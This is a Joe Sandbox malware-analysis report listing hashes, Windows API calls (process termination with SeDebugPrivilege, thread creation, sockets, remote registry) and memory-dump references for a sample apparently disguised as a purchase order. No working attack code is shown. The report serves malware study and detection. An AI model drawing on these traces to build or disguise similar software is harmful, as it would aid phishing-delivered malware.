                                                                                                                                                                                                      • Opcode ID: d4c9a3347340ec2f6b292e15ccfd5db41bd16ad9e0c1aa6c8d3ee4a06672525c
                                                                                                                                                                                                      • Instruction ID: 4fd7047bc00f5dce267b69f2963a5cde5898196708b614909851b39d2912f40e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4c9a3347340ec2f6b292e15ccfd5db41bd16ad9e0c1aa6c8d3ee4a06672525c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 875153B2A092295BEF54EB55D8419DE73BCAF08314B4040EFF605E3141DB7897C5CB68
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0041EAEB
                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0041EB32
                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0047DC86
                                                                                                                                                                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0047DCF2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                                      • Opcode ID: e35abcf98b5afbda80e3227c5b88a53d0a40ca8882ce08670dafe92d1e5b9445
                                                                                                                                                                                                      • Instruction ID: a205110f149b1f1218910d7447822024f539e8ea0fa6c020a507fcb349153875
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e35abcf98b5afbda80e3227c5b88a53d0a40ca8882ce08670dafe92d1e5b9445
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3041E738A1D2409ED735D72A898DAEB7BA5AF41304F19481FE84B426A1D67C78C1D31E
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B26C
                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B273
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0043AEF1,00000B00,?,?), ref: 0043B288
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B290
                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B293
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0043AEF1,00000B00,?,?), ref: 0043B2A3
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0043AEF1,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B2AB
                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B2AE
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0043B2D4,00000000,00000000,00000000), ref: 0043B2C8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1957940570-0
                                                                                                                                                                                                      • Opcode ID: b09332795f41ada4f02e568152242dc9f8119ecf0a51e018e84ae856f03226e9
                                                                                                                                                                                                      • Instruction ID: 649c36ebd82fd2d6613cd65ed5493ae8568e909360800d4a56ebfdffb0ad5fa3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b09332795f41ada4f02e568152242dc9f8119ecf0a51e018e84ae856f03226e9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6101BBB5641304BFE710ABA5EC4DF6B7BACEB88711F018825FA05DB1E1CA749C00CB65
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                      • API String ID: 0-572801152
                                                                                                                                                                                                      • Opcode ID: e315d8b9a7ed296eecbc4226fe30bc1a590a1587bd0666714106e32b319d473d
                                                                                                                                                                                                      • Instruction ID: 8ae32c326f13b34f968a3fd0732ad79f87ca9b0915bfb685f72443b58ed8f10e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e315d8b9a7ed296eecbc4226fe30bc1a590a1587bd0666714106e32b319d473d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CE1B471A0031AAFDF14DFA4C8C1AAE77B5EB48355F14402EED05A7382D778AD49CB98
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
                                                                                                                                                                                                        • Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF
                                                                                                                                                                                                        • Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717
                                                                                                                                                                                                      • _wcstok.LIBCMT ref: 0045184E
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 004518DD
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00451910
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                                                      • String ID: X$p2Kl2K
                                                                                                                                                                                                      • API String ID: 774024439-158789027
                                                                                                                                                                                                      • Opcode ID: 12b759c7212d31acbcd3e923fc07cd2d485c9cd14401626b6f113df0707e9c81
                                                                                                                                                                                                      • Instruction ID: 5d701206c7572f194744bddddaa9641398cd276a84611de6d7f8691adec13a80
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12b759c7212d31acbcd3e923fc07cd2d485c9cd14401626b6f113df0707e9c81
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCC172715043409FC724EF65C981A5BB7E4BF85354F04496EF8899B2A2DB38ED09CB8A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                      • String ID: Q\E$[$\$\$]$^
                                                                                                                                                                                                      • API String ID: 2102423945-1026548749
                                                                                                                                                                                                      • Opcode ID: d41037d7f92c11d1953dae790eff98430697d4bed10d1df97d3838b3c32972b2
                                                                                                                                                                                                      • Instruction ID: 2ff868d98564f53564248656c62dcad6600245b14121f8b5c79a14c51b419cab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d41037d7f92c11d1953dae790eff98430697d4bed10d1df97d3838b3c32972b2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E517071D002099BCF24CF99C9817EEB7B1AF94314F24817BD858B7391D738AD858B99
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00446532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00446554
                                                                                                                                                                                                        • Part of subcall function 00446532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00446564
                                                                                                                                                                                                        • Part of subcall function 00446532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004465F9
                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046179A
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004617AD
                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004617D9
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00461855
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00461860
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00461895
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                                                                                                      • Opcode ID: 270c03403a1bab446a1558f45870165f337d3cd8e2a64d14bab469aaa4e9bc0a
                                                                                                                                                                                                      • Instruction ID: d2d618a15ae8a2f00e8176200d48da833dd737e9018933eaf1cf8cd54ec3b0d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 270c03403a1bab446a1558f45870165f337d3cd8e2a64d14bab469aaa4e9bc0a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C41E231600200AFDB05EF55C8D6FAE77A5AF54304F08846EF9069F3D2EB7C99008B9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 004458B8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: IconLoad
                                                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                                                                                                      • Opcode ID: 5bfb3e2f318e15bc9736881087da9f68b7bd6f9ed755ebbf19411a783dae3153
                                                                                                                                                                                                      • Instruction ID: c7aeb5d251757967eccb0ff0c75affac7e8e2f1af9d52ff6fef3c92f1c8c2872
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bfb3e2f318e15bc9736881087da9f68b7bd6f9ed755ebbf19411a783dae3153
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A11D831749756BBBF116A55AC92DAB33DC9F25314B20003BF500A6283EBACAA11426D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0044A806
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ArraySafeVartype
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1725837607-0
                                                                                                                                                                                                      • Opcode ID: 7a8f8a471411fe2fa06817c37687fc143dfbfe5ddb5f0facf6f6bd21be5f378c
                                                                                                                                                                                                      • Instruction ID: ed324042c9a2b2701b04785601773068e8da0337221a3b70339ad8aef4324f64
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a8f8a471411fe2fa06817c37687fc143dfbfe5ddb5f0facf6f6bd21be5f378c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63C19F75A4121ADFEB00DF94C481BAEB7F4FF08314F24446AE605E7381D738A956CB9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00446B63
                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00446B6A
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00446B80
                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00446B87
                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00446BAD
                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00446BCB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00446BA8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                      • API String ID: 3648134473-3128320259
                                                                                                                                                                                                      • Opcode ID: 584890564f3e5e306f944e4d1379c1c94349139ecdd1e8586c36002fd5fee6da
                                                                                                                                                                                                      • Instruction ID: 869915b13ef1c9269c9a5a225239d8a80d17e3bad1684c58eb68944aaf863664
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 584890564f3e5e306f944e4d1379c1c94349139ecdd1e8586c36002fd5fee6da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6018BF2D002187FEB11A790DD89EFB376CD704304F0048A6B745D2041EA749E844F79
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D
                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00462BF6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BuffCharConnectRegistryUpper
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2595220575-0
                                                                                                                                                                                                      • Opcode ID: 6d31954bfeeb4fbec2f24b2ba4668f25a2aa16c926f529318bfd36a693b94962
                                                                                                                                                                                                      • Instruction ID: 1436c638f4f59939a06b47cea4d9ff7190834685fc5c7c5e6771a34debbfa418
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d31954bfeeb4fbec2f24b2ba4668f25a2aa16c926f529318bfd36a693b94962
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8919E71604201AFC700EF55C991B6EB7E5FF88318F04882EF99697291EB78E945CF4A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • select.WSOCK32 ref: 00459691
                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0045969E
                                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 004596C8
                                                                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004596E9
                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 004596F8
                                                                                                                                                                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 004597AA
                                                                                                                                                                                                      • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0049DC00), ref: 00459765
                                                                                                                                                                                                        • Part of subcall function 0043D2FF: _strlen.LIBCMT ref: 0043D309
                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00459800
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3480843537-0
                                                                                                                                                                                                      • Opcode ID: 904ac2158f58d9bd18f055b439e2098055e7f6b06fe52123bc4c9fc01e9cca11
                                                                                                                                                                                                      • Instruction ID: ecb2f0696e13bfc4d0e437cf891625e32063767c5bd0d3a1f1d580528dc96400
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 904ac2158f58d9bd18f055b439e2098055e7f6b06fe52123bc4c9fc01e9cca11
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C381D371504200EBC714EF65CC85E6BB7A8EF85718F104A2EF955972D2EB38DD08CB9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __mtinitlocknum.LIBCMT ref: 0042A991
                                                                                                                                                                                                        • Part of subcall function 00427D7C: __FF_MSGBANNER.LIBCMT ref: 00427D91
                                                                                                                                                                                                        • Part of subcall function 00427D7C: __NMSG_WRITE.LIBCMT ref: 00427D98
                                                                                                                                                                                                        • Part of subcall function 00427D7C: __malloc_crt.LIBCMT ref: 00427DB8
                                                                                                                                                                                                      • __lock.LIBCMT ref: 0042A9A4
                                                                                                                                                                                                      • __lock.LIBCMT ref: 0042A9F0
                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,004B6DE0,00000018,00435E7B,?,00000000,00000109), ref: 0042AA0C
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(8000000C,004B6DE0,00000018,00435E7B,?,00000000,00000109), ref: 0042AA29
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(8000000C), ref: 0042AA39
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
